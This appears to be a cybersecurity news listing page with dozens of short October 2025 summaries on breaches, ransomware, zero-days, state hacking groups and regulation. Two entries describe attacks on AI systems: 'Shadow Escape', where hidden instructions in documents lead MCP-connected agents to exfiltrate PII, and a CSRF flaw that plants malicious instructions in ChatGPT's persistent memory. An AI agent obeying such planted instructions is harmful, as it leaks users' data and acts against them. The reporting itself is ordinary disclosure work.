EY Leaks 4TB+ SQL Database Packed with Corporate Secrets via Cloud Misconfiguration

Consulting giant EY (Ernst & Young) inadvertently exposed a massive, 4TB+ SQL Server backup file to the public internet due to a cloud storage misconfiguration. The unencrypted `.BAK` file, discovered by researchers at Neo Security, contained a treasure trove of highly sensitive internal data, including API keys, service account passwords, session tokens, and user credentials. The incident highlights the severe risks associated with cloud service misconfigurations, where tools designed for convenience can lead to catastrophic data exposure if not secured properly. Neo Security described the leak as equivalent to finding the 'master blueprint and physical keys to a vault.'

Oct 30, 20255 min read

IncRansom Claims 20TB Data Heist from Evolve Mortgage Services

The 'incransom' ransomware group has claimed responsibility for a significant data breach at Evolve Mortgage Services, listing the company on its dark web leak site on October 30, 2025. The attackers allege they have stolen over 20 terabytes of data, including 2 terabytes of databases containing sensitive PII such as Social Security numbers, client IDs, and full credit histories dating back to 2016. The group is using a pure data-theft extortion model, threatening to leak the data after claiming the company refused to negotiate. This incident highlights the ongoing threat of data extortion attacks against the U.S. financial services sector.

Oct 30, 20255 min read

New 'logins[.]zip' Infostealer Claims 99% Credential Theft in 12 Seconds Using Zero-Days

A new Malware-as-a-Service (MaaS) infostealer named 'logins[.]zip' is being sold on the clear web, boasting incredible speed and efficiency. According to a report from Hudson Rock, its authors claim it can exfiltrate 99% of passwords and cookies from a victim's machine in under 12 seconds. The stealer's key selling point is its alleged use of two Chromium zero-day exploits, which allow it to steal credentials without needing admin rights. The service, sold for $150/month, provides a browser-based builder for creating polymorphic stubs and targets logins, cookies, payment cards, and crypto wallets.

Oct 30, 20255 min read

UK's NCSC Warns 'Nationally Significant' Cyber Attacks Have More Than Doubled

The UK's National Cyber Security Centre (NCSC) has released its 2025 Annual Review, revealing a stark increase in major cyber threats. The agency handled 204 'nationally significant' incidents in the past year, more than double the 89 from the previous year. Ransomware remains the most acute threat, particularly to the UK's Critical National Infrastructure (CNI). The report highlights a growing gap between the escalating threats from APTs and cybercriminals and the nation's collective defenses, prompting the NCSC to urge all UK businesses to make cyber resilience a board-level priority and adopt foundational security controls.

Oct 29, 20255 min read

"Shadow Escape": New Zero-Click Attack Steals Data from ChatGPT, Claude, and Gemini

A novel zero-click attack vector named "Shadow Escape" has been discovered by researchers at Operant, capable of silently exfiltrating sensitive data from popular AI agents like OpenAI's ChatGPT, Anthropic's Claude, and Google's Gemini. The attack exploits the Model Context Protocol (MCP) by embedding hidden malicious instructions within seemingly benign documents. This allows for the theft of personally identifiable information (PII) without any user interaction, bypassing traditional security tools and posing a significant threat to enterprises adopting agentic AI.

Oct 29, 20255 min read

Massive 70TB Data Leak at Tata Motors from Exposed AWS Keys

A colossal security failure at Tata Motors has resulted in the exposure of over 70 terabytes of sensitive corporate data, customer information, and infrastructure details. The breach, which was first identified in 2023, stemmed from multiple critical misconfigurations, including plaintext Amazon Web Services (AWS) access keys hardcoded on a customer-facing website. These credentials provided unrestricted access to numerous S3 buckets containing a vast trove of data, including customer PII and financial records.

Oct 29, 20255 min read

Herodotus Android Malware Mimics Human Typing to Bypass Biometric Security

A new Android banking trojan named Herodotus has emerged, offered as a Malware-as-a-Service (MaaS) by a threat actor known as 'K1R0'. The malware is notable for its novel evasion technique: it mimics human typing behavior by introducing random delays during remote control sessions. This method is specifically designed to defeat behavioral biometric security systems that analyze user interaction patterns to detect fraud. Active campaigns have been observed targeting banking and crypto app users in Italy and Brazil.

Oct 29, 20254 min read

Chrome Zero-Day Exploited by "Mem3nt0 mori" APT to Deploy Spyware

A critical zero-day vulnerability in Google Chrome, CVE-2025-2783, has been actively exploited in a targeted espionage campaign dubbed "Operation ForumTroll." The campaign, which began in March 2025, is attributed to the advanced persistent threat (APT) group known as "Mem3nt0 mori." The attackers used the exploit to deliver a sophisticated backdoor called LeetAgent, a spyware tool developed by the Italian vendor Memento Labs, primarily targeting organizations in Russia and Belarus.

Oct 29, 20255 min read

Qantas Data Breach: 5.7M Customer Records Leaked in Salesforce Supply Chain Attack

The personal data of 5.7 million Qantas Airways customers has been published on the dark web by a group calling itself 'Scattered Lapsus$ Hunters'. The leak, which occurred after a ransom deadline passed on October 11, 2025, is part of a broader supply chain attack that compromised a third-party Salesforce system used by one of the airline's offshore call centers. The compromised data includes names, emails, frequent flyer information, and for some, addresses, phone numbers, and dates of birth. The attack vector involved social engineering, with hackers impersonating Salesforce employees to gain access. Qantas confirmed the breach, stating it is one of 39 companies affected by the campaign and that financial data and passwords were not compromised. The incident has prompted warnings of secondary phishing attacks and a class-action complaint.

Oct 29, 20257 min read

Clop Ransomware Breaches American Airlines Subsidiary Envoy Air, Exploiting Oracle EBS Flaw

Envoy Air, a regional airline owned by American Airlines, has confirmed it was a victim of a hacking campaign orchestrated by the Clop ransomware group. The attackers exploited vulnerabilities in Oracle's E-Business Suite (EBS) to gain access and exfiltrate data. While Envoy Air states that no sensitive customer or personal data was compromised, the breach involved some business information and commercial contacts. Clop has listed American Airlines among more than 60 victims of its recent campaign targeting unpatched Oracle systems, threatening to leak stolen data if ransoms are not paid.

Oct 28, 20255 min read

Massive Breach at Kenyan Health Platform M-TIBA Exposes 4.8 Million Patients

A threat actor named 'Kazu' has claimed responsibility for a catastrophic data breach against M-TIBA, a major mobile health platform in Kenya backed by Safaricom. The hacker alleges the theft of 2.15 terabytes of data, impacting up to 4.8 million users. The compromised information reportedly includes a vast trove of personally identifiable information (PII) and highly sensitive protected health information (PHI), such as patient diagnoses and treatment records from nearly 700 healthcare facilities. A 2GB data sample has already been leaked to substantiate the claim.

Oct 28, 20255 min read

CISA Warns of Critical Flaws in Global Fuel Gauge Systems, Risking Infrastructure Disruption

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical advisory for two vulnerabilities in Veeder-Root's TLS4B Automatic Tank Gauge (ATG) systems, which are used globally to monitor fuel levels. The most severe flaw, CVE-2025-58428, has a CVSS score of 9.9 and could allow a remote, authenticated attacker to execute system-level commands, potentially causing widespread disruption to fuel infrastructure. A second flaw, CVE-2025-55067, relates to the 'Year 2038' problem and could cause denial-of-service conditions.

Oct 28, 20255 min read

Critical Apache Tomcat Flaws Expose Servers to RCE and Console Hijacking

The Apache Software Foundation has released patches for two critical vulnerabilities, CVE-2025-55752 and CVE-2025-55754, affecting Apache Tomcat versions 9, 10, and 11. The most severe flaw, CVE-2025-55752, is a directory traversal bug that can be escalated to remote code execution (RCE) if non-default settings like PUT requests are enabled. The second flaw could allow for console manipulation on Windows systems. Administrators are urged to upgrade to the latest versions immediately.

Oct 28, 20255 min read

North Korea's BlueNoroff APT Targets macOS Users with New 'GhostCall' Malware

The North Korean advanced persistent threat (APT) group BlueNoroff has been linked to two new sophisticated campaigns, 'GhostCall' and 'GhostHire,' which specifically target macOS users. According to Kaspersky, the financially motivated group, a subset of the Lazarus Group, is targeting venture capitalists and Web3 developers with fake Zoom and Microsoft Teams clients, AI-enhanced social engineering, and a new suite of malware designed to steal cryptocurrency. Victims have been identified globally, including in Japan, Italy, France, and Singapore.

Oct 28, 20255 min read

U.S. Coast Guard Poised for 'Generational Change' in Maritime Cybersecurity with $25B Funding

The U.S. Coast Guard (USCG) is set for a 'generational change' in maritime cybersecurity, according to an analysis by the Center for Strategic and International Studies (CSIS). Nearly $25 billion in new funding, combined with expanded regulatory authorities, will allow the USCG to comprehensively modernize its systems, implement a zero-trust architecture, and enforce new cybersecurity standards across the entire U.S. Marine Transportation System. The move signals a major strategic shift, elevating cyberspace to an operational domain on par with air, land, and sea.

Oct 28, 20254 min read

Over-Privileged Active Directory Domain-Join Accounts Create Major Security Risk

A new security analysis reveals that Active Directory (AD) domain-join accounts, even when configured according to official guidance, often inherit excessive privileges that create a reliable pathway for attackers to achieve full domain compromise. These specialized accounts, used for automated machine provisioning, can have their credentials exposed during deployment. Attackers can then abuse the account's powerful default permissions, such as object ownership and rights related to Resource-Based Constrained Delegation (RBCD), to escalate privileges and take over computer objects.

Oct 28, 20255 min read

Microsoft Report: AI-Generated Phishing Now 4.5x More Effective, Bypassing Traditional Defenses

According to the Microsoft 2025 Digital Defense Report, the effectiveness of phishing attacks has surged with the adoption of artificial intelligence. AI-generated emails now achieve a 54% click-through rate, 4.5 times higher than traditional methods. The report, covering July 2024 to June 2025, also highlights a 32% increase in identity-based attacks and the growing use of AI by nation-state actors for disinformation. Microsoft stresses that phishing-resistant MFA remains the most effective defense, blocking over 99% of identity attacks.

Oct 27, 20255 min read

CISA Orders Federal Agencies to Patch New Actively Exploited Vulnerability

On October 22, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a new, unspecified vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This action confirms that the flaw is being actively exploited in the wild by malicious actors. Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies are now required to remediate this vulnerability by a specific deadline to protect federal networks. While the CVE identifier was not immediately released, the alert serves as a critical warning to all organizations to prioritize its patching.

Oct 27, 20255 min read

18 Minutes to Mayhem: Ransomware Attacks Now Fully Automated, Slashing Defender Response Time

A new report from ReliaQuest reveals a dramatic acceleration in ransomware attacks, with the average time from initial access to lateral movement ('breakout time') plummeting to just 18 minutes. This is a significant decrease from 48 minutes in 2024, driven by the adoption of automation and AI by 80% of Ransomware-as-a-Service (RaaS) groups. The report highlights the Qilin ransomware gang as a prime example, whose platform automates key attack phases like discovery, backup deletion, and encryption. Other groups like LockBit are also integrating AI to enhance their operations, creating a hyper-competitive landscape where speed and automation are paramount. This shrinking response window poses a monumental challenge for security teams, demanding automated detection and response capabilities to counter the threat.

Oct 27, 20257 min read

Critical Adobe Commerce Flaw Under Active Exploitation, CISA Warns

A critical improper input validation vulnerability in Adobe Commerce and Magento, tracked as CVE-2025-54236, is being actively exploited in the wild. Dubbed 'SessionReaper,' the flaw allows an unauthenticated remote attacker to hijack user sessions via the REST API, leading to potential web shell deployment and complete store takeover. CISA has added the vulnerability to its KEV catalog, and with reports suggesting over 60% of Magento stores remain unpatched, immediate action is urged for all administrators.

Oct 27, 20255 min read

ChatGPT Flaw Allows 'Memory Poisoning' via CSRF Attack

A novel vulnerability discovered in OpenAI's ChatGPT Atlas web browser allows attackers to perform 'memory poisoning' through a Cross-Site Request Forgery (CSRF) attack. Researchers at LayerX Security found that this flaw can be used to invisibly inject malicious instructions into ChatGPT's persistent 'Memory' feature. These instructions survive across sessions and devices, and can be triggered by a user's normal prompts to execute malicious code, potentially leading to account takeover or malware deployment.

Oct 27, 20254 min read

APT-C-60 Escalates 'SpyGlace' Campaign Against Japan

The South Korea-aligned cyber-espionage group APT-C-60 has significantly intensified its campaign against Japanese organizations in the third quarter of 2025. According to JPCERT/CC and Cyble, the group has deployed at least three new versions of its custom 'SpyGlace' backdoor. The attackers have evolved their tactics, now attaching malicious VHDX files directly to phishing emails and abusing legitimate services like GitHub and StatCounter for stealthy command-and-control communications and malware delivery, making detection more challenging.

Oct 27, 20254 min read

Healthcare Sector Rocked by Breaches at ModMed, LifeBridge, and Right at Home

The healthcare sector continues to be a prime target for cyberattacks, with recent data breaches announced by Electronic Health Record (EHR) provider Modernizing Medicine (ModMed), home healthcare provider Right at Home, and Baltimore-based LifeBridge Health. The incidents, which include a ransomware attack claimed by the Sinobi group and a third-party breach via Oracle Health, have exposed a vast range of sensitive Protected Health Information (PHI), including Social Security numbers, medical diagnoses, and financial data.

Oct 27, 20254 min read

DDoS Attack on Russian Food Agency Cripples National Supply Chains

Russia's federal agency for veterinary and phytosanitary surveillance, Rosselkhoznadzor, has been targeted by a large-scale distributed denial-of-service (DDoS) attack starting October 22, 2025. The attack crippled the agency's critical electronic certification systems, including the 'Mercury' platform, which is essential for tracking animal products. The outage caused significant delays in food shipments from major producers of meat, milk, and baby food across the nation, highlighting the vulnerability of critical national infrastructure to cyberattacks. Russian telecom providers are working to mitigate the attack, for which no group has claimed responsibility.

Oct 26, 20254 min read

Safepay Ransomware Hits German Surveillance Firm Xortec, Sparking Supply Chain Fears

The Safepay ransomware group has claimed responsibility for a cyberattack against Xortec GmbH, a German provider of professional video surveillance solutions. The group has listed Xortec on its data leak site with a payment deadline of October 27, 2025. This attack raises significant supply chain concerns, as a compromise of a value-added distributor like Xortec could potentially lead to backdoored hardware or software being deployed in sensitive client environments. Safepay is a relatively new but aggressive ransomware-as-a-service (RaaS) operation known for its rapid double-extortion attacks.

Oct 26, 20255 min read

Google Issues Emergency Patch for Critical Chrome RCE Flaw Found by AI

Google has released an emergency security update for the Chrome browser, addressing a critical remote code execution (RCE) vulnerability in its V8 JavaScript engine. The flaw, tracked as CVE-2025-12036, was discovered by Google's internal AI-driven research project, 'Big Sleep.' Successful exploitation could allow an attacker to execute arbitrary code on a user's system by tricking them into visiting a malicious website. The patch has been rolled out for Windows, macOS, and Linux users, who are urged to update their browsers immediately to mitigate the high-severity threat.

Oct 25, 20254 min read

Nation-State and Financial Cybercrime Blur as Industrial Sector Becomes Top Target

A new report from Trellix reveals a significant convergence between the tactics of nation-state actors and financially motivated cybercriminals, with both increasingly leveraging AI-powered tools. The industrial sector has emerged as the most targeted industry, accounting for over 36% of attacks analyzed between April and September 2025. The research highlights the dominance of PowerShell as a key attack tool, used in nearly 78% of ransomware campaigns. The United States remains the most targeted nation, and the ransomware landscape is highly fragmented, with the top five groups accounting for less than 40% of all incidents.

Oct 25, 20255 min read

India Enacts New Telecom Cybersecurity Rules for IMEI and Mobile Number Validation

India's Ministry of Communications has enacted new cybersecurity regulations for its telecommunications sector, effective October 22, 2025. The 'Telecommunications (Telecom Cyber Security) Amendment Rules, 2025' introduce two key measures: the establishment of a centralized Mobile Number Validation (MNV) platform to secure digital communications, and stricter controls on International Mobile Equipment Identity (IMEI) numbers. The new IMEI rules prohibit the assignment of already-used IMEIs to new devices and mandate that sellers and buyers of used devices verify the IMEI against a national database to combat theft and tampering.

Oct 25, 20254 min read

UN Convention Against Cybercrime Signed in Hanoi Amid Global Endorsement and Controversy

In a landmark event in Hanoi, Vietnam, representatives from nearly 100 UN member states have signed the United Nations Convention against Cybercrime. Adopted by the UN General Assembly in December 2024, this treaty, also known as the Hanoi Convention, establishes the first global legal framework for international cooperation in combating a wide array of online crimes, including fraud, child exploitation, and money laundering. While hailed as a milestone by the UN Secretary-General, the event drew criticism from rights groups over the choice of Vietnam as the host, and a major tech industry group, the Cybersecurity Tech Accord, declined to attend.

Oct 25, 20254 min read

EU Accuses Meta and TikTok of Breaching Digital Services Act Transparency Rules

The European Commission has issued preliminary findings that Meta's platforms (Facebook and Instagram) and TikTok have breached their obligations under the Digital Services Act (DSA). The Commission alleges the companies failed to provide adequate access to public data for researchers, hindering independent scrutiny of their platforms. Furthermore, Meta is accused of using 'dark patterns' and creating a burdensome process for users to report illegal content. These are initial findings, and both companies will have the opportunity to respond and propose remedies before any final decision or penalties are imposed.

Oct 25, 20254 min read

Ransomware Attacks on Critical Industries Skyrocket by 34%, KELA Reports

A new report from cyber intelligence firm KELA reveals a staggering 34% year-over-year increase in ransomware attacks targeting critical industries between January and September 2025. These vital sectors, including manufacturing, healthcare, and energy, accounted for half of all 4,701 recorded global incidents. The United States was the most heavily targeted nation. The report also highlights the consolidation of the ransomware ecosystem, with just five groups—Qilin, Clop, Akira, Play, and SafePay—responsible for nearly a quarter of all attacks.

Oct 25, 20255 min read

Patch Now: Microsoft Fixes 170+ Flaws, Including Four Actively Exploited Zero-Days

Microsoft has released its October 2025 Patch Tuesday update, a massive release fixing over 170 security vulnerabilities across its product ecosystem. The update is critical for all users, as it contains patches for four zero-day vulnerabilities that are being actively exploited in the wild. Two of these flaws, CVE-2025-24990 and CVE-2025-59230, allow for local privilege escalation to Administrator or SYSTEM rights. CISA has added the exploited vulnerabilities to its KEV catalog, mandating urgent patching for federal agencies.

Oct 25, 20255 min read

UK Gov & NCSC Issue Urgent Warning to FTSE 350 Boards on Cyber Resilience

The UK's National Cyber Security Centre (NCSC) and government ministers have sent a formal letter to the leaders of all FTSE 350 companies, demanding that cyber resilience be treated as a top board-level priority. The call to action follows the NCSC's latest annual review, which revealed a 50% increase in significant cyber incidents. The letter outlines three practical steps: adopt the government's Cyber Governance Code, enroll in the NCSC's Early Warning service, and mandate Cyber Essentials certification throughout supply chains.

Oct 24, 20255 min read

Google Patches 6th Actively Exploited Chrome Zero-Day of 2025

Google has issued an emergency security update for its Chrome web browser to address CVE-2025-10585, a high-severity type confusion vulnerability in the V8 JavaScript engine. This marks the sixth time in 2025 that Google has patched a Chrome zero-day vulnerability that was being actively exploited in the wild. The flaw could allow an attacker to achieve arbitrary code execution on a victim's machine by tricking them into visiting a malicious website. All users of Chrome and other Chromium-based browsers are urged to update immediately.

Oct 24, 20255 min read

Agenda Ransomware Evolves, Hits Critical Infrastructure

The Agenda ransomware group, also known as Qilin, is escalating its attacks by targeting critical infrastructure sectors with evolved tactics. According to research from Trend Micro, the ransomware-as-a-service (RaaS) operation is using a cross-platform approach, abusing legitimate remote management tools and deploying Linux-based ransomware on Windows hosts to evade security. The group also employs Bring Your Own Vulnerable Driver (BYOVD) attacks to neutralize endpoint defenses and steals backup credentials to hinder recovery, primarily targeting high-value organizations in the U.S., Canada, and the U.K.

Oct 24, 20255 min read

Tengu Ransomware Hits Brazilian Education Provider

The Tengu ransomware group has claimed responsibility for a cyberattack against UniCursos, a prominent education provider in Brazil. The attack, which was posted to the group's leak site on October 23, 2025, follows the common double-extortion model, where the attackers threaten to publish sensitive stolen data if their ransom demands are not met. The incident highlights the continued targeting of the education sector by ransomware gangs, who view them as valuable targets due to the sensitive student and staff data they hold.

Oct 24, 20254 min read

Ransomware Hits Jewett-Cameron, Steals Financial Data

Jewett-Cameron, an Oregon-based manufacturing and distribution company, has confirmed in an SEC filing that it suffered a ransomware attack on October 15, 2025. The attack caused significant disruption to its business operations and resulted in the theft of sensitive corporate data. The exfiltrated information reportedly includes IT and financial data being prepared for the company's upcoming Form 10-K filing, as well as screen captures from video meetings. The unidentified attackers have demanded a ransom and threatened to leak the stolen material.

Oct 24, 20254 min read

Lawsuit Hits SC School District After Ransomware Breach

South Carolina's Lexington-Richland School District 5 (LR5) is facing a class-action lawsuit following a ransomware attack in June 2025 that exposed the personally identifiable information (PII) of over 31,000 students, staff, and alumni. The lawsuit alleges that the school district was negligent in protecting sensitive data and violated state law by failing to provide timely and complete notification of the breach. The compromised data included names, birthdates, Social Security numbers, and financial files, making it one of the most significant breaches for an educational institution in the region.

Oct 24, 20254 min read

Lazarus Group's 'Operation DreamJob' Targets EU Drone-Makers

The notorious North Korea-linked APT group, Lazarus, is conducting a cyber-espionage campaign dubbed 'Operation DreamJob' targeting European defense and aerospace companies. The campaign specifically focuses on firms involved in Unmanned Aerial Vehicle (UAV) technology. The attackers use sophisticated social engineering, creating fake recruiter profiles and job offers to lure employees. The ultimate goal is to compromise the target's network to steal sensitive intellectual property related to advanced drone technology.

Oct 24, 20255 min read

Iran's MuddyWater APT Targets 100+ Governments with Phoenix Backdoor

The Iranian state-sponsored threat group MuddyWater is conducting a large-scale cyber-espionage campaign targeting over 100 government entities, primarily in the Middle East and North Africa (MENA). According to Group-IB, the attackers are using phishing emails sent from a compromised mailbox, leveraging the NordVPN service for anonymity. The emails contain malicious Word documents that use macros to deploy version 4 of the 'Phoenix' backdoor, a payload designed for foreign intelligence gathering. The campaign highlights the group's return to classic macro-based attack vectors.

Oct 23, 20256 min read

Unit 42 Exposes 'Smishing Deluge' from China and 'Jingle Thief' Gift Card Fraud

Researchers at Palo Alto Networks' Unit 42 have detailed two distinct and significant cybercrime operations. The first, a massive smishing campaign dubbed 'The Smishing Deluge,' is attributed to a China-based threat actor and is flooding mobile users globally with malicious SMS messages. The second campaign, named 'Jingle Thief,' is a sophisticated cloud-based operation focused on automating the theft and monetization of gift cards. These findings, highlighted in Unit 42's October Threat Bulletin, showcase the diverse tactics of modern criminals, from large-scale social engineering to highly targeted financial fraud.

Oct 23, 20255 min read

Critical RCE Flaw in WSUS Allows Unauthenticated SYSTEM Takeover

A critical remote code execution (RCE) vulnerability, CVE-2025-59287, with a CVSS score of 9.8, has been discovered in Microsoft's Windows Server Update Services (WSUS). The flaw allows an unauthenticated attacker on the same network to gain SYSTEM-level privileges on a vulnerable server by sending a maliciously crafted cookie. The vulnerability stems from an unsafe deserialization process. While not yet exploited in the wild, Microsoft rates exploitation as "more likely." Given that compromising WSUS could enable an attacker to distribute malicious updates across an entire enterprise, immediate patching is strongly advised.

Oct 23, 20254 min read

Massive Prosper Data Breach Exposes Social Security Numbers of 17.6 Million Users

The peer-to-peer lending platform Prosper has confirmed a catastrophic data breach compromising the sensitive personally identifiable information (PII) of approximately 17.6 million people. The exposed data includes full names, physical addresses, IP addresses, income levels, and, most critically, Social Security numbers. The breach, first detected in September 2025, places millions of individuals at severe risk of identity theft and sophisticated financial fraud.

Oct 23, 20257 min read

NY Regulator Puts Financial Firms on Notice: You Are Accountable for Your Vendors' Security

The New York State Department of Financial Services (DFS) has issued new guidance for financial institutions, emphasizing their ultimate accountability for managing cybersecurity risks originating from third-party service providers (TPSPs). The regulator warned that as firms increasingly rely on cloud computing, AI, and fintech solutions from vendors, their exposure to threats grows. The guidance explicitly states that boards of directors and senior officers must possess sufficient cybersecurity knowledge to oversee and challenge management's third-party risk strategies. DFS Acting Superintendent Kaitlin Asrow stressed that regulated entities cannot outsource their responsibility for protecting consumer data and ensuring operational security.

Oct 23, 20255 min read

Healthcare Breaches Seem to Drop, But Government Shutdown Hides True Numbers

Official data for September 2025 shows only 26 major healthcare data breaches, the lowest monthly total since 2018. However, The HIPAA Journal cautions that this apparent decline is misleading. A US government shutdown has largely halted the HHS's Office for Civil Rights (OCR) from processing and updating its public breach portal. The 26 reported breaches affected over 1.29 million individuals, with hacking incidents accounting for 98.8% of the exposed records. Experts believe the true number of breaches for September is significantly higher and will be reflected in a surge of reports once the OCR resumes normal operations.

Oct 23, 20255 min read

Palomar Health Breach Exposes Highly Sensitive Patient Data, Including Biometrics

Palomar Health Medical Group (PHMG), a California-based healthcare provider, has announced it was the victim of a cybersecurity incident that exposed sensitive patient data. The compromised information includes not only names and personal identifiers but also highly sensitive data types such as biometric data, U.S. alien registration numbers, and financial account information. The full scope of the breach, including the number of affected patients, has not yet been disclosed. The national class action law firm Lynch Carpenter is now investigating claims against PHMG, signaling significant legal and financial fallout for the provider.

Oct 23, 20255 min read

CrowdStrike: 76% of Organizations Can't Keep Pace with AI-Powered Ransomware

According to CrowdStrike's '2025 State of Ransomware Survey,' a staggering 76% of global organizations feel their defensive capabilities cannot match the speed and sophistication of AI-powered cyberattacks. Adversaries are now weaponizing artificial intelligence to accelerate every stage of the ransomware attack chain, from malware creation to social engineering, rendering legacy detection methods obsolete. Nearly half of organizations now view AI-automated attacks as their single greatest ransomware threat.

Oct 23, 20255 min read

UK's NCSC Warns of Doubling 'Nationally Significant' Cyberattacks, Cites Supply Chain Risk

The UK's National Cyber Security Centre (NCSC) has reported a sharp increase in cyberattacks, with 'nationally significant' cases more than doubling in the past year. In response, the NCSC is urging organizations to bolster their incident preparedness. Experts are pointing to vulnerabilities within the digital supply chain as a primary entry point for these attacks, with service providers like helpdesks becoming gateways to core business systems. A recent survey found that nearly a third of UK procurement managers reported a supply chain partner had been attacked in recent months.

Oct 22, 20254 min read

Critical Netty Zero-Day Bypasses All Major Email Authentication

A critical zero-day vulnerability, CVE-2025-59419, has been discovered in the widely used Netty Java library, affecting countless applications that handle email. The flaw allows an unauthenticated attacker to perform SMTP injection by embedding carriage return and line feed characters into email commands. This enables them to bypass standard email authentication defenses like SPF, DKIM, and DMARC, making it possible to send highly convincing spoofed emails that appear to originate from trusted domains. A patch is available and should be applied immediately.

Oct 22, 20256 min read

Patch Now: Critical RCE Flaws in Oracle E-Business Suite Marketing Module

Oracle has issued urgent patches for two critical, unauthenticated remote code execution (RCE) vulnerabilities in its E-Business Suite. The flaws, CVE-2025-53072 and CVE-2025-62481, both carry a CVSS score of 9.8 and affect the Oracle Marketing module. An attacker with network access can exploit these vulnerabilities via a simple HTTP request, without any user interaction, to achieve a full takeover of the marketing component. Oracle urges customers using affected versions (12.2.3 through 12.2.14) to apply the October 2025 Critical Patch Update immediately.

Oct 22, 20255 min read

DHS Breach: 'CitrixBleed 2.0' Zero-Day Exposes FEMA & CBP Employee Data

A critical zero-day vulnerability in Citrix NetScaler Gateway, dubbed 'CitrixBleed 2.0' (CVE-2025-5777), was exploited to breach the U.S. Department of Homeland Security. The attack, which began in June 2025, compromised the personal and employment data of staff at the Federal Emergency Management Agency (FEMA) and U.S. Customs and Border Protection (CBP). The threat actor gained initial access through FEMA's Region 6 network and moved laterally, leading to significant federal scrutiny and subsequent staff dismissals.

Oct 21, 20255 min read

Chinese APT Salt Typhoon Targets European Telecom with SNAPPYBEE Backdoor

The Chinese state-sponsored group Salt Typhoon has been observed targeting a European telecommunications firm by exploiting a known Citrix NetScaler vulnerability for initial access. Post-exploitation, the attackers deployed a backdoor known as SNAPPYBEE (or Deed RAT) using DLL side-loading techniques, hiding the malicious payload alongside legitimate antivirus executables to evade detection. The attack, which was part of a broader cyber-espionage campaign, was detected in its early stages by Darktrace before significant data exfiltration occurred.

Oct 21, 20255 min read

'GlassWorm' Worm Uses Unicode Obfuscation and Solana C2 in VS Code Supply Chain Attack

A highly sophisticated, self-propagating worm named 'GlassWorm' is targeting Visual Studio developers through malicious extensions on the OpenVSX marketplace. The malware employs advanced evasion techniques, including using invisible Unicode characters to obfuscate its code and leveraging the Solana blockchain for a resilient command-and-control (C2) infrastructure. The worm is designed to steal NPM, GitHub, and Git credentials, as well as drain cryptocurrency from 49 different wallet extensions.

Oct 21, 20255 min read

Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure

The Russian state-sponsored threat group COLDRIVER, also known as Star Blizzard and UNC4057, has demonstrated remarkable operational agility by deploying new malware families just five days after its LOSTKEYS malware was publicly disclosed in May 2025. According to Google's Threat Intelligence Group (GTIG), the group has ceased using LOSTKEYS and is now actively using a new toolset, including the NOROBOT DLL and a PowerShell backdoor called MAYBEROBOT, to target high-value individuals such as NGOs, policy advisors, and dissidents.

Oct 21, 20255 min read

UK Regulators Issue Cyber Recovery Guide for Financial Firms

The United Kingdom's top financial regulators—the Bank of England (BoE), the Financial Conduct Authority (FCA), and the Prudential Regulation Authority (PRA)—have jointly published a guide on effective cyber response and recovery practices. The guidance, aimed at all financial firms, emphasizes the critical need for the ability to recover from severe attacks by using immutable backups, maintaining segregated recovery environments, and conducting rigorous testing of both internal and third-party resilience.

Oct 21, 20254 min read

EU Launches Cybersecurity Reserve to Bolster Incident Response Across Member States

The European Union has officially established the European Cybersecurity Reserve as a key component of its Cyber Solidarity Act. Managed by the EU Agency for Cybersecurity (ENISA), the reserve has a €36 million budget and consists of 45 pre-vetted, trusted private providers, such as Airbus Protect and Spike Reply. This 'cyber reinforcement team' is designed to be deployed to assist EU member states and institutions during large-scale cyber incidents affecting critical infrastructure.

Oct 21, 20253 min read

'Cavalry Werewolf' APT Targets Russian Critical Infrastructure with Custom Malware

The Advanced Persistent Threat (APT) group known as Cavalry Werewolf (also tracked as YoroTrooper and Silent Lynx) conducted a targeted cyberattack campaign against Russia's public sector and critical industries between May and August 2025. The group leveraged spear-phishing emails to deliver custom malware, including FoalShell and StallionRAT. Post-compromise activities focused on reconnaissance and establishing persistence via Windows Registry modifications, while using SOCKS5 proxies for command-and-control and data exfiltration.

Oct 21, 20255 min read

CISA Mandates Patching for 5 New Actively Exploited Flaws in Apple, Microsoft, Oracle, and Kentico

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The flaws affect a range of widely used products, including Apple devices, Kentico Xperience, Microsoft Windows SMB Client, and Oracle E-Business Suite. Federal agencies are now mandated to apply patches by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to mitigate significant cyber risk.

Oct 20, 20258 min read

Anubis Ransomware Hits Australian Engineering Firm Aussie Fluid Power

The Australian industrial engineering company, Aussie Fluid Power, has confirmed it was hit by a ransomware attack claimed by the emerging 'Anubis' ransomware group. The incident, which has impacted company operations and stakeholder data, aligns with warnings from the Australian Cyber Security Centre (ACSC) about increasing cyber threats to critical infrastructure and the industrial sector. This attack underscores the growing risk posed by new ransomware gangs targeting operational technology (OT) environments.

Oct 20, 20257 min read

EU and Ukraine Deepen Cyber Defense Alliance in Face of Russian Aggression

The European Union and Ukraine have reaffirmed their strategic partnership on cybersecurity during their 4th Cyber Dialogue held in Kyiv. Against the backdrop of Russia's ongoing war, both parties committed to deepening cooperation on cyber defense, policy alignment with EU standards like the NIS2 Directive, and the protection of critical infrastructure. Ukraine will continue to share threat intelligence gained from defending against Russian cyberattacks to bolster the EU's collective security.

Oct 20, 20255 min read

Lending Platform Prosper Breached, 17.6 Million Accounts Exposed

The peer-to-peer lending platform Prosper has confirmed a massive data breach that exposed the personal and sensitive information of approximately 17.6 million user accounts. The breach notification service 'Have I Been Pwned' has already incorporated the data set, which includes names, email addresses, and phone numbers. The incident places millions of users at a significantly higher risk of targeted phishing campaigns, identity theft, and other fraudulent activities. Affected users are strongly advised to change their passwords and enable multi-factor authentication immediately.

Oct 20, 20254 min read

Clop Ransomware Claims Harvard University Breach, Threatens Data Leak

The prolific Russian-speaking ransomware group Clop has claimed responsibility for a cyberattack against Harvard University, adding the prestigious institution to its data leak site on October 12, 2025. The group, known for its 'big-game hunting' and exploitation of zero-day vulnerabilities, threatened to publish stolen data, stating that a torrent link would be available soon. The claim has not yet been confirmed by Harvard. Clop, also known as TA505, has a history of high-profile attacks using double-extortion tactics, including the mass exploitation of flaws in MOVEit Transfer and GoAnywhere MFT, which affected hundreds of organizations worldwide.

Oct 19, 20255 min read

